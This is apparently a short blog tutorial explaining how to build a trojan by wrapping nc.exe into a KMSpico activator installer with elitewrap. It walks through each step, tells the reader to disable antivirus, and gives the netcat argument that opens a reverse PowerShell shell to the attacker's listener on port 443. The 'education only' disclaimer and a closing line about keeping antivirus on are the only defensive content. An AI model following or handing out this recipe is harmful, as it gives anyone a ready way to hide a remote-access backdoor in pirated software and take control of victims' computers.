How to create the Simple Trojan?

GrimTheRipper
3 min readAug 9, 2022

This Article is for education purposes only.

Today I will show the scenario step of creating a simple trojan to reverse shell from victim to attacker.

In this case, I use nc.exe as a payload to the KMSpico Activator installer.

KMSpico Activator is used to activate Microsoft Products and it needs you to turn off Antivirus (Trojan can be detected by Antivirus).

** We need to disable any antivirus before downloading resources for creating trojan.

I use my kali to listening the TCP connection on port 443.
My kali has IP is 192.168.20.130.

First, Download elitewrap.exe from here. and unzip it.

The archive password is set to p4ssw0rd.

Next download Full_Setup_KMS_Pico from here. and move it to elitewrap directory.

Download nc.exe from here. and move it to elitewrap directory.

Now, we ready created a trojan.

Open elitewrap.exe and type “KMS.exe” and press enter to set the name of the output file.

Type “Setup_File_KMS_Pico.exe” and press enter to set the package file #1.

Type 2 and press enter to choose operation.

Press enter with blank to skip to package file #2.

Next, Type “nc.exe” and press enter to set package file #2.

Type 3 and press enter to choose operation.

Type payload as the command line and press enter.

-e powershell 192.168.20.130 443

Press enter with blank to skip package file #3.

We’ll get the KMS.exe like this.

When we open KMS.exe, nc.exe will execute the reverse shell payload and My kali machine will get the shell.

Conclusion

We can see that it is not very difficult to create a Trojan. Keeping your antivirus on will help prevent trojans and only download files from trusted sources.

--

--

GrimTheRipper

You get the best out of others when you give the best of yourself